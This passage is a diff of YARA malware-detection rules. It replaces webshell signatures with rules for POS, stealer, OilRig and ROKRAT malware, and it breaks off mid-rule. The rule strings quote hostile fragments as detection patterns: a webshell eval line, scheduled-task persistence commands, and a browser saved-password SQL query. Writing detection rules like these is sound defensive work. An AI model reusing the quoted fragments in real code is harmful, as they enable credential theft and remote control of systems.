+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_FSO_S_Zehir4_2
+rule SIGNATURE_BASE_Bernhardpos
 {
 	meta:
-		description = "Webshells Auto-generated - file zehir4.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7de89d22-0230-508a-ac50-f61730ad9f4e"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8733-L8744"
+		description = "BernhardPOS Credit Card dumping tool"
+		author = "Nick Hoffman / Jeremy Humble"
+		id = "9b9e1507-cf1b-5653-beaa-458205e367c3"
+		date = "2015-07-14"
+		modified = "2023-12-05"
+		reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bernhard_pos.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b496a61363d304532bcf52ee21f5d55"
-		logic_hash = "bb10f2e28bb375366b9140c06bb242cd13fdb69e67ce72ecae0e50270566f116"
-		score = 75
+		hash = "e49820ef02ba5308ff84e4c8c12e7c3d"
+		logic_hash = "c00f2fda5a391b44767d918945069f18cef084dd4dc6aa94d8f945bf97ac462a"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "\"Program Files\\Serv-u\\Serv"
+		$shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? }
+		$mutex_name = "OPSEC_BERNHARD"
+		$build_path = "C:\\bernhard\\Debug\\bernhard.pdb"
+		$string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d }
 
 	condition:
-		all of them
+		any of them
 }
-rule SIGNATURE_BASE_FSO_S_Indexer_2
+rule SIGNATURE_BASE_MAL_Compromised_Cert_Ducktail_Stealer_Jun23 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file indexer.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ef79a60-fa8c-51ee-bd87-f5467a66099b"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8745-L8756"
+		description = "Detects binaries signed with compromised certificates used by DuckTail stealer - identified in June 2023"
+		author = "dr4k0nia"
+		id = "b491e1b6-42c4-58e9-8efa-19e697804f96"
+		date = "2023-06-16"
+		modified = "2023-08-12"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ducktail_compromised_certs_jun23.yar#L2-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "135fc50f85228691b401848caef3be9e"
-		logic_hash = "8cf4c8fb1e985adbed2cf20578fcfc14240f6d9fe6062bbe3fe2f895f58bc172"
-		score = 75
+		logic_hash = "9b7916700359d662e99003727f5293f5a937254ff265c3bc8bb8763e196daa0e"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "17c75f2d14af9f00822fc1dba00ccc9ec71fc50962e196d7e6f193f4b2ee0183"
+		hash2 = "b3cfdb442772d07a7f037b0bb093ba315dfd1e79b0e292736c52097355495270"
+		hash3 = "9afe013cae0167993a6a7ccd650eb1221a5ec163110565eb3a49a8b57949d4ee"
 
 	strings:
-		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
+		$sx1 = "AZM MARKETING COMPANY LIMITED" ascii fullword
+		$sx2 = "CONG TY TNHH" ascii
+		$sx3 = {43 C3 94 4E 47 20 54 59 20 54 4E 48 48 20}
+		$sx4 = "CONG TY TRACH" ascii
+		$se1 = {65 78 BE 85 2D 48 E3 3D 4E 48 B8 D4 73 F5 B7 60}
+		$se2 = {1D 53 38 32 74 2B 58 37 87 C0 A2 53 32 F7 FB 06}
+		$se3 = {00 BD 7B 85 B2 6A 69 C9 7D 6D 68 CC 95 67 34 C0 6B}
+		$se4 = {06 5F 5C 57 0B D6 A7 98 92 FB B0 E6 34 61 3A 4D}
+		$se5 = {41 55 3F 07 13 37 11 7A 99 B4 58 57}
+		$se6 = {1E AA E4 CE E7 EE 89 FB 20 32 59 27 88 13 D8 53}
+		$se7 = {56 DC DB 85 D4 89 F9 87 B2 D6 76 72}
+		$se8 = {2D A4 50 57 C2 74 3C 1A 3C A4 93 7A}
+		$se9 = {37 AE 95 F5 4C 8E 9B D0 B6 47 68 6A}
+		$se10 = {3D C8 F5 3B 62 7A 34 07 AC 7E 01 00 13 87 A3 B3}
+		$se11 = {01 C9 87 5A 5F A8 59 68 6D 34 17 C9}
+		$se12 = {1B 35 19 E1 CD C2 6B 57 DA EE 06 C9}
+		$se13 = {79 7D 0B 5E 22 AA 0F C7 A2 97 E6 48}
+		$se14 = {57 9E 5C 89 B0 85 A7 96 B3 3C F3 19}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $sx* ) and 1 of ( $se* )
 }
-rule SIGNATURE_BASE_Hytop_Devpack_2005
+rule SIGNATURE_BASE_Oilrig_Strings_Oct17 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
+		description = "Detects strings from OilRig malware and malicious scripts"
 		author = "Florian Roth (Nextron Systems)"
-		id = "963effd9-f31d-5238-9419-b5dd11822e56"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8757-L8770"
+		id = "edf7c7ca-0c58-5507-8d99-83078ff8947a"
+		date = "2017-10-18"
+		modified = "2022-12-21"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L11-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
-		logic_hash = "b312cddff4c5292cc51acc39448c815fede3c9356d7d225c3a08c7124712b3f8"
+		logic_hash = "3987fa1ccb215edeb0d36c947fd6d7a24847ea854d3f355d1aef4b000f55e710"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
-		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
-		$s9 = "scrollbar-face-color:#E4E4F3;"
+		$x1 = "%localappdata%\\srvHealth.exe" fullword wide ascii
+		$x2 = "%localappdata%\\srvBS.txt" fullword wide ascii
+		$x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" ascii
+		$x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" ascii
+		$s3 = ".LoadDll(\"Run\", arg, \"C:\\\\Windows\\\\" ascii
 
 	condition:
-		all of them
+		filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE__Root_040_Zip_Folder_Deploy
+rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file deploy.exe"
+		description = "Detects OilRig malware from Unit 42 report in October 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e592ab2-8a53-59d5-a45d-971398586479"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8771-L8784"
+		id = "237fe7af-a2ab-51ae-bc96-3af46b08622a"
+		date = "2017-10-18"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/JQVfFP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L42-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2c9f9c58999256c73a5ebdb10a9be269"
-		logic_hash = "9852b105e6a28f5500fc6739b196dd14b9b0b69b1077be4063735380b0699abb"
+		logic_hash = "d7e659440e3abc7355f2e21ea8f63cfb7b17b5715e4575bdccf9d646ed47db20"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc"
+		hash2 = "0ccb2117c34e3045a4d2c0d193f1963c8c0e8566617ed0a561546c932d1a5c0c"
 
 	strings:
-		$s5 = "halon synscan 127.0.0.1 1-65536"
-		$s8 = "Obviously you replace the ip address with that of the target."
+		$s1 = "###$$$TVqQAAMAAAAEAAAA" ascii
+		$s2 = "C:\\Users\\J-Win-7-32-Vm\\Desktop\\error.jpg" fullword wide
+		$s3 = "$DATA = [System.Convert]::FromBase64String([IO.File]::ReadAllText('%Base%'));[io.file]::WriteAllBytes(" ascii
+		$s4 = " /c echo powershell > " fullword wide ascii
+		$s5 = "\\Libraries\\servicereset.exe" wide
+		$s6 = "%DestFolder%" fullword wide ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 2 of them
 }
-rule SIGNATURE_BASE_By063Cli
+rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file by063cli.exe"
+		description = "Detects OilRig malware from Unit 42 report in October 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b4a4842-e084-53e8-90fb-603ba034b7df"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8785-L8797"
+		id = "08771b23-1d0e-5da7-b42c-005ed257e2d1"
+		date = "2017-10-18"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/JQVfFP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L63-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "49ce26eb97fd13b6d92a5e5d169db859"
-		logic_hash = "c89159b73232bc8fd7430b3330009f4b3eb25b9511515bc9b4cd433f7a67f30e"
+		logic_hash = "ad00c7293f61f1b5528c3eea0dc32c10d40aeacc194be84a7f64d19b069f1add"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fcad263d0fe2b418db05f47d4036f0b42aaf201c9b91281dfdcb3201b298e4f4"
+		hash2 = "33c187cfd9e3b68c3089c27ac64a519ccc951ccb3c74d75179c520f54f11f647"
 
 	strings:
-		$s2 = "#popmsghello,are you all right?"
-		$s4 = "connect failed,check your network and remote ip."
+		$x1 = "PolicyConverter.exe" fullword wide
+		$x2 = "SrvHealth.exe" fullword wide
+		$x3 = "srvBS.txt" fullword wide
+		$s1 = "{a3538ba3-5cf7-43f0-bc0e-9b53a98e1643}, PublicKeyToken=3e56350693f7355e" fullword wide
+		$s2 = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 2 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Icyfox007V1_10_Rar_Folder_Asp
+
+rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples3 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file asp.asp"
+		description = "Detects OilRig malware from Unit 42 report in October 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52150b6a-2f60-5e6b-86d1-61bc0aeb4fa8"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8798-L8809"
+		id = "e26510bd-d183-566a-a185-ebed7a81401c"
+		date = "2017-10-18"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/JQVfFP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L84-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2c412400b146b7b98d6e7755f7159bb9"
-		logic_hash = "3cc36668f0a2a6807b59c7da0b6e504b519a616ab63fb9f606eba5dc4a9e7e2f"
+		logic_hash = "a4984cf33e7b0e0dae264ed11caae6cfab9db2a6047a46ec41c28b5637b4589b"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 81
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
+		$x1 = "cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1" ascii
+		$x2 = "schtasks /create /sc minute /mo 0002 /tn TimeUpdate /tr" fullword ascii
+		$x3 = "-c  SampleDomain.com -m scheduleminutes" fullword ascii
+		$x4 = ".ntpupdateserver.com" fullword ascii
+		$x5 = ".msoffice365update.com" fullword ascii
+		$s1 = "out.exe" fullword ascii
+		$s2 = "\\Win32Project1\\Release\\Win32Project1.pdb" ascii
+		$s3 = "C:\\windows\\system32\\cmd.exe /c (" ascii
+		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
+		$s5 = "Agent configured successfully" fullword ascii
+		$s6 = "\\runlog*" ascii
+		$s7 = "can not specify username!!" fullword ascii
+		$s8 = "Agent can not be configured" fullword ascii
+		$s9 = "%08lX%04hX%04hX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX" fullword ascii
+		$s10 = "!!! can not create output file !!!" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or pe.imphash ( ) == "861ac226fbe8c99a2c43ff451e95da97" or ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_Byshell063_Ntboot_2
+rule SIGNATURE_BASE_ROKRAT_Malware : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ntboot.dll"
+		description = "Detects ROKRAT Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9bcb401d-619b-54b8-be51-f0e3b6eb096c"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8811-L8822"
+		id = "52e7e144-b704-5254-9a0f-928fbc96f877"
+		date = "2017-04-03"
+		modified = "2021-09-14"
+		reference = "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L8-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
-		logic_hash = "25df29000bb410c0ba1fec78920124f6eedbc2585541536239522d2b116270ab"
+		logic_hash = "8b8fa3f97ce13e501cc25b89e2cfdaf785f1cb9f57a9dbd3461596b1bc6178c2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00"
+		hash2 = "cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c"
 
 	strings:
-		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
+		$x1 = "c:\\users\\appdata\\local\\svchost.exe" fullword ascii
+		$x2 = "c:\\temp\\episode3.mp4" fullword ascii
+		$x3 = "MAC-SIL-TED-FOO-YIM-LAN-WAN-SEC-BIL-TAB" ascii
+		$x4 = "c:\\temp\\%d.tmp" ascii fullword
+		$s1 = "%s%s%04d%02d%02d%02d%02d%02d.jar" fullword ascii
+		$s2 = "\\Aboard\\Acm%c%c%c.exe" ascii
+		$a1 = "ython" ascii fullword
+		$a2 = "iddler" ascii fullword
+		$a3 = "egmon" ascii fullword
+		$a6 = "iresha" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 25000KB and ( 1 of ( $x* ) or ( 5 of them ) )
 }
-rule SIGNATURE_BASE_U_Uay
+
+rule SIGNATURE_BASE_ROKRAT_Dropper_Nov17 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file uay.exe"
+		description = "Detects dropper for ROKRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a670e19-6e53-5b13-aabf-fe74d48b9113"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8823-L8835"
+		id = "4f3156a2-6b1b-5c65-b8fa-84c0b739d703"
+		date = "2017-11-28"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L48-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
-		logic_hash = "45e8938ce34fd5a253cee3867aa8c4429c6bf3fcc91098ed9df3f95656bc5f8f"
+		logic_hash = "4a444342a4fb4d10aaf8efb5c26954847ce1089c9cec37d1ab3b03e0ac566c6c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
-		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
+		hash1 = "eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14"
+		hash2 = "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037"
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and pe.imphash ( ) == "c6187b1b5f4433318748457719dd6f39"
 }
-rule SIGNATURE_BASE_Bin_Wuaus
+rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file wuaus.dll"
+		description = "Detects Freenki infostealer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "50b5323b-d8d1-5350-bf93-8dde3d11fd87"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8836-L8852"
+		id = "01365093-e40a-524a-8a13-217742542f1e"
+		date = "2017-11-28"
+		modified = "2023-01-06"
+		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L63-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "46a365992bec7377b48a2263c49e4e7d"
-		logic_hash = "0509ca39662430c3ababf65ca3a6e9af95250163980829d90eddf5341168c864"
+		logic_hash = "e823ef5506b2fdf30a6ff9bdf6eee552b767b66a6c007a30618fc212d598b540"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
 
 	strings:
-		$s1 = "9(90989@9V9^9f9n9v9"
-		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
-		$s3 = ";(=@=G=O=T=X=\\="
-		$s4 = "TCP Send Error!!"
-		$s5 = "1\"1;1X1^1e1m1w1~1"
-		$s8 = "=$=)=/=<=Y=_=j=p=z="
+		$x1 = "base64Encoded=\"TVqQAAMAAAAEAAAA" ascii
+		$x2 = "command =outFile &\" sysupdate\"" fullword ascii
+		$x3 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
+		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
+		$s2 = "c:\\TEMP\\CrashReports\\" ascii
+		$s3 = "objShell.run command, 0, True" fullword ascii
+		$s4 = "sysDir = shell.ExpandEnvironmentStrings(\"%windir%\")" fullword ascii
+		$s5 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
+		$s6 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
+		$a1 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$a2 = "SELECT username_value, password_value, signon_realm FROM logins" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of them or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Pwreveal
+
+rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17_Export_Sig_Testing : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file pwreveal.exe"
+		description = "Detects Freenki infostealer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3d79dd13-9012-56e2-b42a-e6b3e204c601"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8853-L8867"
+		id = "929f9d41-2e71-5a86-b12f-489355bdf88d"
+		date = "2017-11-28"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L94-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b4e8447826a45b76ca45ba151a97ad50"
-		logic_hash = "01c9582897c65e608d49a151fe9ade97b9a031d7d10f5fd4b4d0c2a3fd83e7b6"
-		score = 75
+		logic_hash = "2c6d8784aa976501a77441c4e705b7fdc9654277e8cd3f6d966967fb2e1cd724"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "*<Blank - no es"
-		$s3 = "JDiamondCS "
-		$s8 = "sword set> [Leith=0 bytes]"
-		$s9 = "ION\\System\\Floating-"
+		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and pe.exports ( "getUpdate" ) and pe.number_of_exports == 1
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Xwhois
+rule SIGNATURE_BASE_ROKRAT_Nov17_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file xwhois.exe"
+		description = "Detects ROKRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8f3b3bb2-5884-584a-8220-b6edbfebc8a3"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8868-L8882"
+		id = "6bf3653b-1f96-5060-b6fd-82ccc83fad77"
+		date = "2017-11-28"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L110-L127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0bc98bd576c80d921a3460f8be8816b4"
-		logic_hash = "75ee56dae5fde75ae4dc4bba835a96016781b747f3cff0dc6d52e665463a6070"
+		logic_hash = "12641d417408ef32292204f620efa3d1347238fa1c6f63b2b6f09a6c660e9e24"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "rting! "
-		$s2 = "aTypCog("
-		$s5 = "Diamond"
-		$s6 = "r)r=rQreryr"
+		$s1 = "\\T+M\\Result\\DocPrint.pdb" ascii
+		$s2 = "d:\\HighSchool\\version 13\\2ndBD" ascii
+		$s3 = "e:\\Happy\\Work\\Source\\version" ascii
+		$x1 = "\\appdata\\local\\svchost.exe" ascii
+		$x2 = "c:\\temp\\esoftscrap.jpg" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Vanquish_2
+rule SIGNATURE_BASE_APT_PY_Bluelight_Loader : INKYSQUID
 {
 	meta:
-		description = "Webshells Auto-generated - file vanquish.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6736cad6-cba1-5b6f-ae05-e2b980280479"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8883-L8894"
+		description = "Python Loader used to execute the BLUELIGHT malware family."
+		author = "threatintel@volexity.com"
+		id = "f8da3e40-c3b0-5b7f-8ece-81874993d8cd"
+		date = "2021-06-22"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L39-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2dcb9055785a2ee01567f52b5a62b071"
-		logic_hash = "428dc4e6d8bcc888e6f99f69ee9f211aa029d3486b99b9716d09709dc391d9a2"
+		logic_hash = "e7e18a6d648b1383706439ba923335ac4396f6b5d2a3dc8f30f63ded7df29eda"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "INKYSQUID"
+		hash1 = "80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$s2 = "Vanquish - DLL injection failed:"
+		$s1 = "\"\".join(chr(ord(" ascii
+		$s2 = "import ctypes " ascii
